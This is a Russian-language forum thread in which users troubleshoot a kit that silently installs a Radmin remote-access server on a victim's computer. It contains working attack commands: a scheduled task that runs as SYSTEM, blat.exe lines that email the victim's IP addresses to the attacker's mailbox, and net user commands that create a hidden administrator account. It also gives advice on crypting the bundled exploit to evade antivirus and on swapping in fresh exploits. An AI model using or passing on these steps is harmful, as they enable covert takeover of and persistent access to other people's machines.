Создание и тихая установка сервера Radmin 3.4 v2

Тема в разделе "Статьи", создана пользователем Iindigo, 16 дек 2010.

1. крах
    крах Новичок
    Симпатии:
    14
    отправка через каждые 15 мин :
    schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr "%SYSTEMROOT%/ip.exe /f

Добавлено через 2 минуты
    В inst.cmd 41-строчку на эту поменяй

советую ставить интервал минимум 30 мин.т.к слишком много отчетов на почту приходит.

Добавлено через 7 минут
    Я еще юзаю VNC так вот там много приимуществ,и минусов хватает.Плюсы в том что он ставится незаметно,ип приходит после перезагрузки 100%,+доступ к вебке. Сбока Рем Контрол на форуме статья есть

Добавлено через 10 минут
    на VNC http://www.xaker.name/forvb/showthread.php?t=19471

на тим вивер кинешь ссылку?

Последнее редактирование: 23 янв 2011
    22 янв 2011
  2. karencho
    karencho Новичок
    Симпатии:
    2
    люди все сделал как написанно,но ип так и не прешло :(

23 янв 2011
  3. Iindigo
    Iindigo Guest
    Значит где-то есть ошибка. Либо порт не тот, либо ящик не правильно указан, итд

23 янв 2011
  4. karencho
    karencho Новичок
    Симпатии:
    2
    blat.exe -install -server smtp.yandex.ru -port 25 -f Login@yandex.ru -u login -pw Pass
    blat.exe -to Login@yandex.ru -subject "Local IP" -attachi "localip.txt" -body "Locals IP"
    blat.exe -to Login@yandex.ru -subject "Real IP" -attachi "realip.txt" -body "Real IP"

вместо логина и пасса я вписалл свои данные...... смтп яндех порт 25 что то не правильно?

23 янв 2011
  5. onthar
    onthar Продвинутый
    Симпатии:
    224
    karencho, фаерволл мог спалить или антивирус.
    Хватит может одинаковые свои проблемы тут писать?

23 янв 2011
  6. karencho
    karencho Новичок
    Симпатии:
    2
    все отклячил,но ничего :(( извините за флуд

23 янв 2011
  7. Iindigo
    Iindigo Guest
    karencho, попробуй 587 порт поставить. У кого-то через него уходит. Было уже такое.

23 янв 2011
  8. karencho
    karencho Новичок
    Симпатии:
    2
    огромное спасибо ;)

23 янв 2011
  9. крах
    крах Новичок
    Симпатии:
    14
    у мя 587 порт

24 янв 2011
  10. radikkk
    radikkk Новичок
    Симпатии:
    0
    onthar,
    А зачем мы создаем Администратора HelpAssistant?

Если жертва сидит под учеткой "Пользователи", в выполнении команд
    net user HelpAssistant admin /add
    net localgroup Ђ¤¬Ё*Ёбва*в®ал HelpAssistant /add
    net user HelpAssistant /active:yes /comment:"“зҐв**п §*ЇЁбм ¤«п ЇаҐ¤®бв*ў«Ґ*Ёп Ї®¬®йЁ" /passwordchg:yes
    net user HelpAssistant admin

будет отказано в доступе.

PS Я говорю про win XP

24 янв 2011
  11. Iindigo
    Iindigo Guest
    radikkk, всё верно. Если под пользователем, то и установка самой сборки будет под вопросом. Но, так уж сложилось, что под XP, в подавляющем случае, люди сидят с правами администратора.

24 янв 2011
  12. Network
    Network Guest
    Превосходная сборка! автор лучший! все работало пока антик невоскликнул,а именно на poc.exe люди подскажите плиз как упрятать poc.exe от антика?

30 янв 2011
    1 человеку нравится это.
  13. Iindigo
    Iindigo Guest
    В соседней теме отвечал:
    1. Закриптовать данный сплойт;
    2. Искать свежие сплойты, например тут (_http://www.exploit-db.com/platform/?p=windows&page=135), компилить и прикручивать вместо текущего.

30 янв 2011
  14. Kharek
    Kharek Новичок
    Симпатии:
    1
    А что если юзать данную сборку без сплойта? Просто поставить запуск от админа, может быть жертва клацнет "Да", будет так работать?

30 янв 2011
  15. Iindigo
    Iindigo Guest
    Будет.

30 янв 2011
  16. Kharek
    Kharek Новичок
    Симпатии:
    1
    У меня проявляется такая трабла в сборке, а именно трабла с realip.exe. При запуске ip.bat данный сценарий останавливается на шаге realip.exe > realip.txt и тупит несколько минут, только потом уже отправляется айпишник (я специально запускал батник, чтобы посмотреть что не так, предварительно удалив @echo off). Я вот думаю удалить его вообще из сценария, но может есть альтернативы данному ехе-шнику?

И еще вопрос, появлялась ли у кого-нибудь такая трабла, что при установке вылетает ошибка сплоита? У меня вылетает окно, что-то типо "Завершено выполнение программы" и т.п., если развернуть детально, то видно, что там ошибка APPCRASH. Может быть это из-за криптора? Дело в том, что все инсталится шикарно, даже экран не мигает, вот если бы не эта ошибка, было вы вообще все классно.

Последнее редактирование: 30 янв 2011
    30 янв 2011
  17. Iindigo
    Iindigo Guest
    Наверняка есть, погугли, я взял первый попавшийся на глаза.

Сплойт может скинуть систему в бсод или подвесить, такое редко, но бывает. А в твоём случае, скорее всего, последствия криптования.

30 янв 2011
  18. PavlikS
    PavlikS Guest
    а уменя радмин убил драйвера ATI _winxp

31 янв 2011
  19. Iindigo
    Iindigo Guest
    Радмин не мог этого сделать.
    На данный момент, несовместимы с драйверами радмина только несколько драйверов от asus.

31 янв 2011
  20. Kharek
    Kharek Новичок
    Симпатии:
    1
    Вот заметил, что при установке на семерку установщик оставляет следы в главном меню.
    В прошлой версии была такая строчка
    Сюда лучше тоже добавить удаление из Пуска

3 фев 2011
Загрузка...